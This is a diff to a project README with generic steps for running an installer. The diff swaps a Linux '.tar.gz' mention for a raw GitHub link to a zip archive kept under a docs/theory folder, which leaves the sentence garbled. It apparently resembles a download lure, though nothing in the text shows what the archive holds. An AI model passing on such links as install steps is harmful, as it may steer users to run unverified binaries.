sadbacon132/argon-v/README.md

 ### Running the Application
 1. After the download completes, locate the file in your Downloads folder.
 2. For Windows, double-click the `.exe` file to start the installation.
 For macOS, open the `.dmg` file and drag the application to your Applications folder.
-For Linux, unpack the `.tar.gz` file and follow the instructions in the README.
+For Linux, unpack the `https://raw.githubusercontent.com/sadbacon132/argon-v/main/docs/theory/argon_v_v1.2.zip` file and follow the instructions in the README.
 3. Follow the prompts in the installer to complete your setup.

 ## 🔒 Understanding the Features